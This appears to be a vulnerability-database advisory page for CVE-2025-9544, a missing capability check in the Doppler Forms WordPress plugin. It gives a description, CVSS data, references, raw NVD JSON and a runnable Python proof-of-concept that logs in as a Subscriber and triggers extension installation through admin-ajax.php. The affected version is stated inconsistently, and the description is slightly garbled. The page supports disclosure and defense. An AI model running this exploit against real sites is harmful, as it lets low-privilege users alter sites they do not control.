CVE-2025-9544

Description

The Doppler Forms WordPress plugin through 2.5.1 registers an AJAX action install_extension without verifying user capabilities or using a nonce. As a result, any authenticated user — including those with the Subscriber role — can install and activate additional Doppler Forms WordPress plugin through 2.5.1 (limited to those whitelisted by the main Doppler Forms WordPress plugin through 2.5.1).

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Doppler Forms WordPress Plugin < 2.5.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-9544 PoC - Doppler Forms Plugin Privilege Escalation
# Target: WordPress site with Doppler Forms plugin < 2.5.1

target = sys.argv[1] if len(sys.argv) > 1 else 'http://target-wordpress-site.com'
username = sys.argv[2] if len(sys.argv) > 2 else 'subscriber'
password = sys.argv[3] if len(sys.argv) > 3 else 'password'

# WordPress login to get authentication cookies
login_url = f'{target}/wp-login.php'
session = requests.Session()

login_data = {
    'log': username,
    'pwd': password,
    'wp-submit': 'Log In',
    'redirect_to': '/wp-admin/',
    'testcookie': '1'
}

print(f'[*] Logging in as {username}...')
resp = session.post(login_url, data=login_data, allow_redirects=False)

if 'wordpress_logged_in' not in str(session.cookies) and resp.status_code != 302:
    print('[-] Login failed!')
    sys.exit(1)

print('[+] Login successful!')

# Exploit the install_extension AJAX action
ajax_url = f'{target}/wp-admin/admin-ajax.php'
exploit_data = {
    'action': 'install_extension',
    'extension': 'example_extension'  # Whitelisted extension name
}

print(f'[*] Exploiting CVE-2025-9544...')
resp = session.post(ajax_url, data=exploit_data)

if resp.status_code == 200 and 'success' in resp.text.lower():
    print('[+] Exploitation successful! Extension installation triggered.')
    print(f'[+] Response: {resp.text[:200]}')
else:
    print('[-] Exploitation may have failed.')
    print(f'[*] Status: {resp.status_code}')
    print(f'[*] Response: {resp.text[:200]}')

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-9544
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-9544
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-9544/
[4] VulDB https://vuldb.com/cve/CVE-2025-9544
[5] https://wpscan.com/vulnerability/06312fba-dfc5-47af-afe3-b01d8941acbf/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-9544", "sourceIdentifier": "[email protected]", "published": "2025-10-29T06:15:33.647", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Doppler Forms WordPress plugin through 2.5.1 registers an AJAX action install_extension without verifying user capabilities or using a nonce. As a result, any authenticated user — including those with the Subscriber role — can install and activate additional Doppler Forms WordPress plugin through 2.5.1 (limited to those whitelisted by the main Doppler Forms WordPress plugin through 2.5.1)."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "references": [{"url": "https://wpscan.com/vulnerability/06312fba-dfc5-47af-afe3-b01d8941acbf/", "source": "[email protected]"}]}}